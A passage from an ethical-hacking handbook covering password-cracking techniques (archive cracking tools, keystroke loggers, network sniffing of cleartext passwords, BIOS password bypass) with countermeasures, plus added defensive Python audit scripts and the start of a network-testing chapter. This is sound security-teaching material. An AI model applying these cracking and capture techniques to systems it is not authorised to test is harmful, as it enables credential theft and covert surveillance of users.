One hundred twenty-eight different ASCII characters are used in typical computer passwords. (Technically, only 126 characters are used because you can’t use the NULL and the carriage return characters.) A truly random eight-character password that uses 126 different characters can have 63,527,879,748,485,376 different combinations. Taking that a step further, if it were possible (and it is in Linux and UNIX) to use all 256 ASCII characters (254, without NULL and carriage return characters) in a password, 17,324,859,965,700,833,536 different combinations would be available. This is approximately 2.7 billion times more combinations than there are people on earth!
A text file containing all the possible passwords would require millions of terabytes of storage space. Even if you include only the more realistic combination of 95 or so ASCII letters, numbers, and standard punctuation characters, such a file would still fill thousands of terabytes of storage space. These storage requirements force dictionary and brute-force password-cracking programs to form the password combinations on the fly, instead of reading all possible combinations from a text file. That’s why rainbow attacks are more effective at cracking passwords than dictionary and brute-force attacks.
Given the effectiveness of rainbow password attacks, it’s realistic to think that eventually, anyone will be able to crack all possible password combinations, given the current technology and average lifespan. It probably won’t happen; however, many thought in the 1980s that 640K of RAM and a 10MB hard drive in a PC were all that would ever be needed!
Cracking password-protected files
Do you wonder how vulnerable password-protected word-processing, spreadsheet, and Zip files are when users send them into the wild blue yonder? Wonder no more. Some great utilities can show how easily passwords are cracked.
Cracking files
Most password-protected files can be cracked in seconds or minutes. You can demonstrate this “wow factor” security vulnerability to users and management. Here’s a hypothetical scenario that could occur in the real world:
1. Your CFO wants to send some confidential financial information in an Excel spreadsheet to a company board member.
2. She protects the spreadsheet by assigning it a password during the file-save process in Excel.
3. For good measure, she uses WinZip to compress the file and adds another password to make it really secure.
4. The CFO sends the spreadsheet as an e-mail attachment, assuming that the e-mail will reach its destination.
The financial advisor’s network has content filtering, which monitors incoming e-mails for keywords and file attachments. Unfortunately, the financial advisory firm’s network administrator is looking in the content-filtering system to see what’s coming in.
5. This rogue network administrator finds the e-mail with the confidential attachment, saves the attachment, and realizes that it’s password protected.
6. The network administrator remembers a great password-cracking tool available from ElcomSoft called Advanced Archive Password Recovery (www.elcomsoft.com/archpr.html) that can help him out so he proceeds to use it to crack the password.
Cracking password-protected files is as simple as that! Now all that the rogue network administrator must do is forward the confidential spreadsheet to his buddies or to the company’s competitors.
If you carefully select the right options in Advanced Archive Password Recovery, you can drastically shorten your testing time. For example, if you know that a password is not over five characters long or is lowercase letters only, you can cut the cracking time in half.
I recommend performing these file-password-cracking tests on files that you capture with a content filtering or network analysis tool. This is a good way to determine whether your users are adhering to policy and using adequate passwords to protect sensitive information they’re sending.
Countermeasures
The best defense against weak file password protection is to require your users to use a stronger form of file protection, such as PGP, or the AES encryption that’s built into WinZip, when necessary. Ideally, you don’t want to rely on users to make decisions about what they should use to secure sensitive information, but it’s better than nothing. Stress that a file encryption mechanism, such as a password-protected Zip file, is secure only if users keep their passwords confidential and never transmit or store them in unsecure cleartext (such as in a separate e-mail).
If you’re concerned about unsecure transmissions through e-mail, consider using a content-filtering system or a data loss–prevention system to block all outbound e-mail attachments that aren’t protected on your e-mail server.
Understanding other ways to crack passwords
Over the years, I’ve found other ways to crack (or capture) passwords technically and through social engineering.
Keystroke logging
One of the best techniques for capturing passwords is remote keystroke logging—the use of software or hardware to record keystrokes as they’re typed into the computer.
Be careful with keystroke logging. Even with good intentions, monitoring employees raises various legal issues if it’s not done correctly. Discuss with your legal counsel what you’ll be doing, ask for their guidance, and get approval from upper management.
Logging tools
With keystroke-logging tools, you can assess the log files of your application to see what passwords people are using:
Keystroke-logging applications can be installed on the monitored computer. I recommend that you check out Spector 360 by SpectorSoft (www.spector360.com). Dozens of other such tools are available on the Internet.
Hardware-based tools, such as KeyGhost (www.keyghost.com), fit between the keyboard and the computer or replace the keyboard altogether.
A keystroke-logging tool installed on a shared computer can capture the passwords of every user who logs in.
Countermeasures
The best defense against the installation of keystroke-logging software on your systems is to use an anti-malware program or similar endpoint protection software that monitors the local host. It’s not foolproof but can help. As for physical keyloggers, you’ll need to visually inspect each system.
The potential for hackers to install keystroke-logging software is another reason to ensure that your users aren’t downloading and installing random shareware or opening attachments in unsolicited e-mails. Consider locking down your desktops by setting the appropriate user rights through local or group security policy in Windows. Alternatively, you could use a commercial lockdown program, such as Fortres 101 (www.fortresgrand.com) for Windows or Deep Freeze Enterprise (www.faronics.com/products/deep-freeze/enterprise) for Windows, Linux, and Mac OS X. A different technology that still falls into this category is Bit9’s “positive security” whitelisting application (www.bit9.com) that allows you to configure which executables can be run on any given system. It’s intended to fight off advanced malware but could certainly be used in this situation.
Weak password storage
Many legacy and standalone applications, such as e-mail, dial-up network connections, and accounting software, store passwords locally, making them vulnerable to password hacking. By performing a basic text search, I've found passwords stored in cleartext on the local hard drives of machines. You can automate the process even further by using a program called FileLocator Pro (www.mythicsoft.com). I cover these file and related storage vulnerabilities in Chapter 16.
Searching
You can try using your favorite text-searching utility — such as the Windows search function, findstr, or grep — to search for password or passwd on your computer's drives. You might be shocked to find what's on your systems. Some programs even write passwords to disk or leave them stored in memory.
Weak password storage is a criminal hacker's dream. Head it off if you can. This doesn't mean to immediately run off and start using a cloud-based password manager. As we've seen over the years, those systems get hacked as well!
Countermeasures
The only reliable way to eliminate weak password storage is to use only applications that store passwords securely. This might not be practical, but it's your only guarantee that your passwords are secure. Another option is to instruct users not to store their passwords when prompted.
Before upgrading applications, contact your software vendor to see how they manage passwords, or search for a third-party solution.
Network analyzer
A network analyzer sniffs the packets traversing the network. This is what the bad guys do if they can gain control of a computer, tap into your wireless network, or gain physical network access to set up their network analyzer. If they gain physical access, they can look for a network jack on the wall and plug right in!
Testing
Figure 8-4 shows how crystal-clear passwords can be through the eyes of a network analyzer. This figure shows how Cain & Abel (www.oxid.it/cain.html) can glean thousands of passwords going across the network in a matter of a couple of hours. As you can see in the left pane, these cleartext password vulnerabilities can apply to FTP, web, telnet, and more. (The actual usernames and passwords are blurred out to protect them.)
Figure 8-4: Using Cain & Abel to capture passwords going across the network.
If traffic is not tunneled through a VPN, SSH, SSL, or some other form of encrypted link, it's vulnerable to attack.
Cain & Abel is a password-cracking tool that also has network analysis capabilities. You can also use a regular network analyzer, such as the commercial products OmniPeek (www.savvius.com/products/overview/omnipeek_family/omnipeek_network_analysis) and CommView (www.tamos.com/products/commview) as well as the free open source program, Wireshark (www.wireshark.org). With a network analyzer, you can search for password traffic in various ways. For example, to capture POP3 password traffic, you can set up a filter and a trigger to search for the PASS command. When the network analyzer sees the PASS command in the packet, it captures that specific data.
Network analyzers require you to capture data on a hub segment of your network or via a monitor/mirror/span port on a switch. Otherwise, you can't see anyone else's data traversing the network — just yours. Check your switch's user guide for whether it has a monitor or mirror port and instructions on how to configure it. You can connect your network analyzer to a hub on the public side of your firewall. You'll capture only those packets that are entering or leaving your network — not internal traffic. I cover this type of network infrastructure hacking in detail in Chapter 9.
Countermeasures
Here are some good defenses against network analyzer attacks:
- Use switches on your network, not hubs. Ethernet hubs are a thing of the past; however, I still see them in use occasionally. If you must use hubs on network segments, a program like sniffdet (http://sniffdet.sourceforge.net) for UNIX-based systems and PromiscDetect (http://ntsecurity.nu/toolbox/promiscdetect) for Windows can detect network cards in promiscuous mode (accepting all packets, whether destined for the local machine or not). A network card in promiscuous mode signifies that a network analyzer may be running on the network.
- Make sure that unsupervised areas, such as an unoccupied lobby or training room, don't have live network connections.
- Don't let anyone without a business need gain physical access to your switches or to the network connection on the public side of your firewall. With physical access, a hacker can connect to a switch monitor port or tap into the unswitched network segment outside the firewall and capture packets.
Switches don't provide complete security because they're vulnerable to ARP poisoning attacks, which I cover in Chapter 9.
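A local-host check in the spirit of sniffdet and PromiscDetect, written here as an added example (not from the book) for Linux: it reads each interface's flags word from sysfs and tests the IFF_PROMISC bit. The sysfs path and the 0x100 bit value come from the Linux kernel's interface flag definitions; the sample flag values in the comments are constructed.

```python
"""Report Linux network interfaces that are in promiscuous mode.

Added example, not from the book.  It reads the flags word the kernel
exposes for every interface under /sys/class/net/<iface>/flags and tests
the IFF_PROMISC bit (0x100 in <linux/if.h>).  A card that is accepting
every frame is the footprint a software network analyzer leaves behind.
"""
import os

IFF_PROMISC = 0x100            # kernel flag: receive all frames on the wire
SYSFS_NET = "/sys/class/net"   # one subdirectory per interface on Linux


def is_promiscuous(flags_text: str) -> bool:
    """True if a hex flags value as read from sysfs (e.g. '0x1103') has IFF_PROMISC set."""
    return bool(int(flags_text.strip(), 16) & IFF_PROMISC)


def read_iface_flags(base: str = SYSFS_NET) -> dict:
    """Map interface name -> raw flags text for every interface under sysfs."""
    flags = {}
    if not os.path.isdir(base):
        return flags           # not Linux, or sysfs not mounted: nothing to check
    for name in sorted(os.listdir(base)):
        try:
            with open(os.path.join(base, name, "flags")) as fh:
                flags[name] = fh.read()
        except OSError:
            continue           # interface disappeared or is not readable
    return flags


def promiscuous_interfaces(flags_by_iface: dict) -> list:
    """Names of the interfaces whose flags word has the promiscuous bit set."""
    return [name for name, text in flags_by_iface.items() if is_promiscuous(text)]


if __name__ == "__main__":
    # Constructed values: 0x1103 is a typical UP|BROADCAST|RUNNING|MULTICAST|PROMISC word,
    # 0x1003 the same card without PROMISC.
    found = promiscuous_interfaces(read_iface_flags())
    if found:
        print("WARNING: interfaces in promiscuous mode:", ", ".join(found))
    else:
        print("No interfaces in promiscuous mode")
```

A hit means either a monitoring tool you know about or a sniffer someone planted; either way it should be accounted for.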
Weak BIOS passwords
Most computer BIOS (basic input/output system) settings allow power-on passwords and/or setup passwords to protect the computer's hardware settings that are stored in the CMOS chip. Here are some ways around these passwords:
- You can usually reset these passwords either by unplugging the CMOS battery or by changing a jumper on the motherboard.
- Password-cracking utilities for BIOS passwords are available on the Internet and from computer manufacturers.
- If gaining access to the hard drive is your ultimate goal, you can simply remove the hard drive from the computer and install it in another one and you're good to go. This is a great way to prove that BIOS/power-on passwords are not an effective countermeasure for lost or stolen laptops.
For a good list of default system passwords for various vendor equipment, check www.cirt.net/passwords.
There are tons of variables for hacking and hacking countermeasures depending on your hardware setup. If you plan to hack your own BIOS passwords, check for information in your user manual or refer to the BIOS password-hacking guide I wrote at http://searchenterprisedesktop.techtarget.com/tutorial/BIOS-password-hacking. If protecting the information on your hard drives is your ultimate goal, then full (sometimes referred to as whole) disk encryption is the best way to go. I cover mobile-related password cracking in-depth in Chapter 11. The good news is that newer computers (within the past five years or so) are using a new type of BIOS called unified extensible firmware interface (UEFI), which is much more resilient to boot-level system cracking attempts. Still, a weak password may be all it takes for the system to be exploited.
Weak passwords in limbo
Bad guys often exploit user accounts that have just been created or reset by a network administrator or help desk. New accounts might need to be created for new employees or even for your own security testing purposes. Accounts might need to be reset if users forget their passwords or if the accounts have been locked out because of failed attempts.
Weaknesses
Here are some reasons why user accounts can be vulnerable:
- When user accounts are reset, they often are assigned an easily cracked password (such as the user's name or the word password). The time between resetting the user account and changing the password is a prime opportunity for a break-in.
- Many systems have either default accounts or unused accounts with weak passwords or no passwords at all. These are prime targets.
Countermeasures
The best defenses against attacks on passwords in limbo are solid help desk policies and procedures that prevent weak passwords from being available at any given time during the new account generation and password reset processes. Perhaps the best ways to overcome this vulnerability are as follows:
- Require users to be on the phone with the help desk, or have a help desk member perform the reset at the user's desk.
- Require that the user immediately log in and change the password.
- If you need the ultimate in security, implement stronger authentication methods, such as challenge/response questions, smart cards, or digital certificates.
- Automate password reset functionality via self-service tools on your network so users can manage most of their password problems without help from others.
I cover mobile-related password cracking in Chapter 11 and website/application password cracking in Chapter 15.
General Password Cracking Countermeasures
A password for one system usually equals passwords for many other systems because many people use the same (or at least similar) passwords on every system they use. For this reason, you might want to consider instructing users to create different passwords for different systems, especially on the systems that protect information that's more sensitive. The only downside to this is that users have to keep multiple passwords and, therefore, might be tempted to write them down, which can negate any benefits.
Strong passwords are important, but you need to balance security and convenience:
- You can't expect users to memorize passwords that are insanely complex and must be changed every few weeks.
- You can't afford weak passwords or no passwords at all, so come up with a strong password policy and accompanying standard — preferably one that requires long and strong passphrases (combinations of words that are easily remembered yet next to impossible to crack) that have to be changed only once or twice a year.
Storing passwords
If you have to choose between weak passwords that your users can memorize and strong passwords that your users must write down, I recommend having readers write down passwords and store the information securely. Train users to store their written passwords in a secure place — not on keyboards or in easily cracked password-protected computer files (such as spreadsheets). Users should store a written password in any of these locations:
- A locked file cabinet or office safe
- Full (whole) disk encryption, which can prevent an intruder from ever accessing the OS and passwords stored on the system. Just know it's not foolproof, as I outline in Chapter 11.
- A secure password management tool such as:
  - LastPass (http://lastpass.com)
  - Password Safe, an open source software originally developed by Counterpane (http://passwordsafe.sourceforge.net)
Again, as I mentioned earlier, applications such as these are not impervious to attack so be careful.
No passwords on sticky notes! People joke about it, but it still happens a lot, and it's not good for business!
Creating password policies
As an ethical hacker, you should show users the importance of securing their passwords. Here are some tips on how to do that:
- Demonstrate how to create secure passwords. Refer to them as passphrases because people tend to take passwords literally and use only words, which can be less secure.
- Show what can happen when weak passwords are used or passwords are shared.
- Diligently build user awareness of social engineering attacks.
Enforce (or at least encourage the use of) a strong password-creation policy that includes the following criteria:
- Use upper- and lowercase letters, special characters, and numbers. Never use only numbers. Such passwords can be cracked quickly.
- Misspell words or create acronyms from a quote or a sentence. For example, ASCII is an acronym for American Standard Code for Information Interchange that can also be used as part of a password.
- Use punctuation characters to separate words or acronyms.
- Change passwords every 6 to 12 months or immediately if they're suspected of being compromised. Anything more frequent introduces an inconvenience that serves only to create more vulnerabilities.
- Use different passwords for each system. This is especially important for network infrastructure hosts, such as servers, firewalls, and routers. It's okay to use similar passwords — just make them slightly different for each type of system, such as SummerInTheSouth-Win10 for Windows systems and Linux+SummerInTheSouth for Linux systems.
- Use variable-length passwords. This trick can throw off attackers because they won't know the required minimum or maximum length of passwords and must try all password length combinations.
- Don't use common slang words or words that are in a dictionary.
- Don't rely completely on similar-looking characters, such as 3 instead of E, 5 instead of S, or ! instead of 1. Password-cracking programs and dictionaries are available to help check for this.
- Don't reuse the same password within at least four to five password changes.
- Use password-protected screen savers. Unlocked screens are a great way for systems to be compromised. You could have the strongest passwords and best full disk encryption in the world, but none of that matters if the computer is left unattended with the screen unlocked.
- Don't share passwords. To each his or her own!
- Avoid storing user passwords in an unsecured central location, such as an unprotected spreadsheet on a hard drive. This is an invitation for disaster. Use a password manager to store user passwords if you're willing. I'm not, just yet.
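The mechanical parts of the criteria above (character classes, digits-only, look-alike substitutions, dictionary words, reuse history) as a checker you could wire into a password-change hook; this is an added example, not code from the book. MIN_LENGTH, HISTORY_DEPTH, the substitution map and the tiny word list are assumptions chosen for the demonstration.

```python
"""Check a candidate passphrase against the policy criteria listed above.

Added example, not from the book.  MIN_LENGTH, HISTORY_DEPTH, the
look-alike substitution map and the tiny WORDLIST are assumptions for
the demonstration; plug in your own policy values and a real dictionary.
Previous passwords are passed in cleartext here only to keep the example
short; a deployment would compare salted hashes.
"""
import re

MIN_LENGTH = 15     # assumption: long enough that Windows never stores an LM hash
HISTORY_DEPTH = 5   # "don't reuse within at least four to five changes"
REQUIRED_CLASSES = {"lower", "upper", "digit", "special"}

# Look-alike substitutions that cracking-dictionary rules undo (assumed set).
LEET = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a",
                      "5": "s", "7": "t", "@": "a", "$": "s"})

# Constructed stand-in for a dictionary plus common slang.
WORDLIST = {"password", "summer", "welcome", "letmein", "qwerty", "dragon"}


def character_classes(pw: str) -> set:
    """Which of the four required character classes the password uses."""
    classes = set()
    if re.search(r"[a-z]", pw):
        classes.add("lower")
    if re.search(r"[A-Z]", pw):
        classes.add("upper")
    if re.search(r"[0-9]", pw):
        classes.add("digit")
    if re.search(r"[^A-Za-z0-9]", pw):
        classes.add("special")
    return classes


def looks_like_dictionary_word(pw: str, wordlist=WORDLIST) -> bool:
    """True if the password is one dictionary word, plain or with look-alike substitutions."""
    core = re.sub(r"[^a-z]", "", pw.lower().translate(LEET))
    return pw.lower() in wordlist or core in wordlist


def check_passphrase(candidate: str, history=(), wordlist=WORDLIST) -> list:
    """Return the policy violations for a candidate; an empty list means it is acceptable."""
    problems = []
    if len(candidate) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if candidate.isdigit():
        problems.append("digits only")
    missing = REQUIRED_CLASSES - character_classes(candidate)
    if missing:
        problems.append("missing " + ", ".join(sorted(missing)))
    if looks_like_dictionary_word(candidate, wordlist):
        problems.append("dictionary word (look-alike substitutions undone)")
    if candidate in list(history)[-HISTORY_DEPTH:]:
        problems.append(f"reused within the last {HISTORY_DEPTH} changes")
    return problems


if __name__ == "__main__":
    # "P@55w0rd!" has all four classes yet is just "password" in disguise;
    # the book's own "SummerInTheSouth-Win10" passes every check.
    for pw in ("P@55w0rd!", "SummerInTheSouth-Win10"):
        print(f"{pw!r}: {check_passphrase(pw) or 'OK'}")
```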
Taking other countermeasures
Here are some other password hacking countermeasures that I recommend:
- Enable security auditing to help monitor and track password attacks.
- Test your applications to make sure they aren't storing passwords indefinitely in memory or writing them to disk. A good tool for this is WinHex (www.winhex.com/winhex/index-m.html). I've used this tool to search a computer's memory for password, pass=, login, and so on and have come up with some passwords that the developers thought were cleared from memory.
- Some password-cracking Trojan-horse applications are transmitted through worms or simple e-mail attachments. Such malware can be lethal to your password-protection mechanisms if they're installed on your systems. The best defense is malware protection or whitelisting software, from Webroot, McAfee, or Bit9.
- Keep your systems patched. Passwords are reset or compromised during buffer overflows or other denial of service (DoS) conditions.
- Know your user IDs. If an account has never been used, delete or disable the account until it's needed. You can determine unused accounts by manual inspection or by using a tool such as DumpSec (www.systemtools.com/somarsoft/?somarsoft.com), a tool that can enumerate the Windows operating system and gather user IDs and other information.
As the security manager in your organization, you can enable account lockout to prevent password-cracking attempts. Account lockout is the ability to lock user accounts for a certain time after a certain number of failed login attempts has occurred. Most operating systems (and some applications) have this capability. Don't set it too low (fewer than five failed logins), and don't set it too high to give a malicious user a greater chance of breaking in. Somewhere between 5 and 50 might work for you. I usually recommend a setting of around 10 or 15. Consider the following when configuring account lockout on your systems:
- To use account lockout to prevent any possibilities of a user DoS condition, require two different passwords, and don't set a lockout time for the first one if that feature is available in your operating system.
- If you permit auto reset of the account after a certain period — often referred to as intruder lockout — don't set a short time period. Thirty minutes often works well.
A failed login counter can increase password security and minimize the overall effects of account lockout if the account experiences an automated attack. A login counter can force a password change after a number of failed attempts. If the number of failed login attempts is high and occurred over a short period, the account has likely experienced an automated password attack.
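The lockout and failed-login-counter behaviour described above, as an added example (not from the book) you can run against a constructed stream of login attempts: it locks after 10 failures, auto-resets after 30 minutes, and flags an account for a forced password change when failures pile up faster than a person could type them. AUTOMATED_COUNT and AUTOMATED_WINDOW are my assumptions, since the text gives no numbers for the counter.

```python
"""Account lockout with intruder (auto) reset plus a failed-login counter.

Added example, not from the book: a small state machine that applies the
settings recommended above (lock after 10 failures, auto-reset after 30
minutes) and flags accounts whose failure rate looks like an automated
password attack so a password change can be forced.  AUTOMATED_COUNT and
AUTOMATED_WINDOW are assumptions; the login events fed in are constructed.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOCKOUT_THRESHOLD = 10                       # failed logins before the account locks
LOCKOUT_DURATION = timedelta(minutes=30)     # intruder lockout: auto-reset period
AUTOMATED_COUNT = 20                         # assumption: this many failures ...
AUTOMATED_WINDOW = timedelta(minutes=1)      # ... inside one minute means a script, not a person


class AccountLockout:
    def __init__(self, threshold=LOCKOUT_THRESHOLD, duration=LOCKOUT_DURATION):
        self.threshold = threshold
        self.duration = duration
        self.failures = defaultdict(int)         # consecutive failures per user
        self.locked_until = {}                   # user -> time the lock expires
        self.failure_times = defaultdict(deque)  # all failure timestamps (the counter)
        self.force_change = set()                # users that must pick a new password

    def is_locked(self, user, now):
        until = self.locked_until.get(user)
        if until is None:
            return False
        if now >= until:                         # intruder lockout expired: auto-reset
            del self.locked_until[user]
            self.failures[user] = 0
            return False
        return True

    def attempt(self, user, password_ok, now):
        """Process one login attempt and return 'allowed', 'denied' or 'locked'."""
        if self.is_locked(user, now):
            self._count_failure(user, now)       # even a correct password is refused while locked
            return "locked"
        if password_ok:
            self.failures[user] = 0              # a success clears the consecutive count
            return "allowed"
        self.failures[user] += 1
        self._count_failure(user, now)
        if self.failures[user] >= self.threshold:
            self.locked_until[user] = now + self.duration
            return "locked"
        return "denied"

    def _count_failure(self, user, now):
        """Failed-login counter: many failures in a short window => automated attack."""
        times = self.failure_times[user]
        times.append(now)
        while times and now - times[0] > AUTOMATED_WINDOW:
            times.popleft()
        if len(times) >= AUTOMATED_COUNT:
            self.force_change.add(user)


def replay(events, start=datetime(2016, 1, 1, 9, 0, 0)):
    """Feed (seconds_after_start, user, password_ok) events through a fresh policy.

    Returns the per-attempt decisions and the users flagged for a forced change.
    """
    acct = AccountLockout()
    decisions = [acct.attempt(user, ok, start + timedelta(seconds=secs))
                 for secs, user, ok in events]
    return decisions, sorted(acct.force_change)


if __name__ == "__main__":
    # Constructed: a user mistypes ten times, is refused while locked, returns after 31 minutes.
    human = [(i, "kbeaver", False) for i in range(10)] + [(10, "kbeaver", True), (31 * 60, "kbeaver", True)]
    print(replay(human))
    # Constructed: a script throws 25 guesses at 'admin' in 50 seconds.
    script = [(2 * i, "admin", False) for i in range(25)]
    print(replay(script))
```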
Other password-protection countermeasures include
- Stronger authentication methods. Examples of these are challenge/response, smart cards, tokens, biometrics, or digital certificates.
- Automated password reset. This functionality lets users manage most of their password problems without getting others involved. Otherwise, this support issue becomes expensive, especially for larger organizations.
- Password-protect the system BIOS. This is especially important on servers and laptops that are susceptible to physical security threats and vulnerabilities.
Securing Operating Systems
You can implement various operating system security measures to ensure that passwords are protected.
Regularly perform these low-tech and high-tech password-cracking tests to make sure that your systems are as secure as possible — perhaps as part of a monthly, quarterly, or biannual audit of local and domain passwords.
Windows
The following countermeasures can help prevent password hacks on Windows systems:
- Some Windows passwords can be gleaned by simply reading the cleartext or crackable ciphertext from the Windows Registry. Secure your registries by doing the following:
  - Allow only administrator access.
  - Harden the operating system by using well-known hardening best practices, such as those from SANS (www.sans.org), NIST (http://csrc.nist.gov), the Center for Internet Security Benchmarks/Scoring Tools (www.cisecurity.org), and the ones outlined in Network Security For Dummies by Chey Cobb.
- Keep all SAM database backup copies secure.
- Disable the storage of LM hashes in Windows for passwords that are shorter than 15 characters. For example, you can create and set the NoLMHash registry key to a value of 1 under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa.
- Use local or group security policies to help eliminate weak passwords on Windows systems before they're created.
- Disable null sessions in your Windows version or enable the Windows Firewall.
- In Windows XP and later versions, enable the Do Not Allow Anonymous Enumeration of SAM Accounts and Shares option in the local security policy.
Chapter 12 covers Windows hacks you need to understand and test in more detail.
Linux and UNIX
The following countermeasures can help prevent password cracks on Linux and UNIX systems:
- Ensure that your system is using shadowed MD5 passwords.
- Help prevent the creation of weak passwords. You can use either the built-in operating system password filtering (such as cracklib in Linux) or a password-auditing program (such as npasswd or passwd+).
- Check your /etc/passwd file for duplicate root UID entries. Hackers can exploit such entries to gain backdoor access.
Chapter 13 explains the Linux hacks and how to test Linux systems for vulnerabilities.
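The Linux and UNIX checks above (shadowed hashes, duplicate root UIDs) as an added audit script that is not from the book. It works on the passwd and shadow formats, reports duplicate UID 0 entries, unshadowed or empty password fields, and which crypt(3) scheme each shadow hash uses; the MD5 scheme the text names has since given way to SHA-512 and yescrypt on current distributions. The two files embedded below are constructed samples with placeholder hashes.

```python
"""Audit /etc/passwd and /etc/shadow for the weaknesses listed above.

Added example, not from the book.  It finds duplicate UID 0 entries,
accounts whose password field is empty or holds a hash in the
world-readable passwd file instead of an 'x' (not shadowed), and reports
which crypt(3) algorithm each shadow hash uses.  The two files below are
constructed samples; the hashes in them are placeholders.
"""
HASH_TYPES = {"$1$": "MD5", "$2": "bcrypt", "$5$": "SHA-256",
              "$6$": "SHA-512", "$y$": "yescrypt"}

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
toor:x:0:0:second root:/root:/bin/bash
legacy:$1$saltsalt$PLACEHOLDERHASHVALUE00:1001:1001::/home/legacy:/bin/sh
guest::1002:1002::/home/guest:/bin/sh
alice:x:1000:1000:Alice:/home/alice:/bin/bash
"""

SAMPLE_SHADOW = """\
root:$6$saltsalt$PLACEHOLDERHASHVALUE00:17000:0:99999:7:::
daemon:*:17000:0:99999:7:::
toor:$6$saltsalt$PLACEHOLDERHASHVALUE00:17000:0:99999:7:::
alice:PLACEHOLD3R.2:17000:0:99999:7:::
"""


def parse_colon_file(text):
    """Split a passwd/shadow style file into field lists, skipping blanks and comments."""
    return [line.split(":") for line in text.splitlines()
            if line.strip() and not line.startswith("#")]


def hash_algorithm(field):
    """Classify a shadow password field by its crypt(3) prefix."""
    if field == "":
        return "none"                      # no password at all
    if field.startswith(("*", "!")):
        return "locked"                    # login disabled or locked
    for prefix, name in HASH_TYPES.items():
        if field.startswith(prefix):
            return name
    return "DES"                           # no prefix: traditional 13-character crypt


def audit(passwd_text, shadow_text):
    """Return human-readable findings for the given passwd and shadow contents."""
    findings = []
    passwd = parse_colon_file(passwd_text)
    uid0 = [row[0] for row in passwd if row[2] == "0"]
    if len(uid0) > 1:
        findings.append("duplicate UID 0 accounts: " + ", ".join(uid0))
    for row in passwd:
        if row[1] == "":
            findings.append(f"{row[0]}: empty password field (no password)")
        elif row[1] != "x":
            findings.append(f"{row[0]}: hash stored in /etc/passwd, not shadowed")
    for row in parse_colon_file(shadow_text):
        algo = hash_algorithm(row[1])
        if algo == "none":
            findings.append(f"{row[0]}: empty hash in /etc/shadow (no password)")
        elif algo == "DES":
            findings.append(f"{row[0]}: traditional DES crypt hash (8-character limit, fast to crack)")
    return findings


if __name__ == "__main__":
    for line in audit(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(line)
    # On a real system (as root): audit(open("/etc/passwd").read(), open("/etc/shadow").read())
```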
Hacking Network Hosts
Read more about how you can find the areas of your network that are creating business risks at www.dummies.com/extras/hacking.
In this part…
Now that you're off and running with your security tests, it's time to take things to a new level. The tests in the previous part — at least the social engineering and physical security tests — start at a high level and are not that technical. Times, they are a-changin'! You now need to look at network security. This is where things start getting more involved.
This part starts by looking at the network from the inside and the outside for perimeter security holes, network device exploits, DoS vulnerabilities, and more. This part then looks at how to assess the security of wireless LANs that introduce some serious security vulnerabilities into networks these days. Finally, this part delves into the ever-growing number of mobile devices that employees use to connect to the network as they please.
Network Infrastructure Systems
In This Chapter
- Selecting tools
- Scanning network hosts
- Assessing security with a network analyzer
- Preventing denial-of-service and infrastructure vulnerabilities
To have secure operating systems and applications, you need a secure network. Devices such as routers, firewalls, and even generic network hosts (including servers and workstations) must be assessed as part of the security testing process.
There are thousands of possible network vulnerabilities, equally as many tools, and even more testing techniques. You probably don't have the time or resources available to test your network infrastructure systems for all possible vulnerabilities, using every tool and method imaginable. Instead, you need to focus on tests that will produce a good overall assessment of your network — and the tests I describe in this chapter produce exactly that.
You can eliminate many well-known, network-related vulnerabilities by simply patching your network hosts with the latest vendor software and firmware updates. Because many network infrastructure systems aren't publicly accessible, odds are good that your network hosts will not be attacked from the outside. You can eliminate many other vulnerabilities by following some solid security practices on your network, as described in this chapter. The tests, tools, and techniques outlined in this chapter offer the most bang for your security assessment buck.
The better you understand network protocols, the easier network vulnerability testing is because network protocols are the foundation for most information security concepts. If you're a little fuzzy on how networks work, I highly encourage you to read TCP/IP For Dummies, 6th Edition, by Candace Leiden and Marshall Wilensky. TCP/IP For Dummies is one of the original books that helped me develop my foundation of networking concepts early on. The Request for Comments (RFCs) list on the Official Internet Protocol Standards page, www.rfc-editor.org/search/standards.php, is a good reference as well.
Understanding Network Infrastructure Vulnerabilities
Network infrastructure vulnerabilities are the foundation for most technical security issues in your information systems. These lower-level vulnerabilities affect practically everything running on your network. That's why you need to test for them and eliminate them whenever possible.
Your focus for security tests on your network infrastructure should be to find weaknesses that others can see in your network so you can quantify and treat your network's level of exposure.
Many issues are related to the security of your network infrastructure. Some issues are more technical and require you to use various tools to assess them properly. You can assess others with a good pair of eyes and some logical thinking. Some issues are easy to see from outside the network, and others are easier to detect from inside your network.
When you assess your company's network infrastructure security, you need to look at the following:
- Where devices, such as a firewall or an IPS, are placed on the network and how they're configured
- What external attackers see when they perform port scans and how they can exploit vulnerabilities in your network hosts
- Network design, such as Internet connections, remote access capabilities, layered defenses, and placement of hosts on the network
- Interaction of installed security devices, such as firewalls, intrusion prevention systems (IPSs), antivirus, and so on
- What protocols are in use, including known vulnerable ones such as Secure Sockets Layer (SSL)
- Commonly attacked ports that are unprotected
- Network host configurations
- Network monitoring and maintenance
If someone exploits a vulnerability in one of the items in the preceding list or anywhere in your network's security, bad things can happen:
- An attacker can launch a denial of service (DoS) attack, which can take down your Internet connection — or your entire network.
- A malicious employee using a network analyzer can steal confidential information in e-mails and files sent over the network.
- A hacker can set up back-door access into your network.
- A contractor can attack specific hosts by exploiting local vulnerabilities across the network.
Before assessing your network infrastructure security, remember to do the following:
- Test your systems from the outside in, and the inside in (that is, on and between internal network segments and demilitarized zones [DMZs]).
- Obtain permission from partner networks to check for vulnerabilities on their systems that can affect your network's security, such as open ports, lack of a firewall, or a misconfigured router.
Choosing Tools
As with all security assessments, your network security tests require the right tools — you need port scanners, protocol analyzers, and vulnerability assessment tools. Great commercial, shareware, and freeware tools are available. I describe a few of my favorite tools in the following sections. Just keep in mind that you need more than one tool because no tool does everything you need.
If you're looking for easy-to-use security tools with all-in-one packaging, you get what you pay for most of the time — especially for the Windows platform. Tons of security professionals swear by many free security tools, especially those that run on Linux and other UNIX-based operating systems. Many of these tools offer a lot of value — if you have the time, patience, and willingness to learn their ins and outs. It'd behoove you to compare the results of the free tools with that of their commercial counterparts. I've definitely found some benefits to using the latter.
Scanners and analyzers
These scanners provide practically all the port scanning and network testing you need:
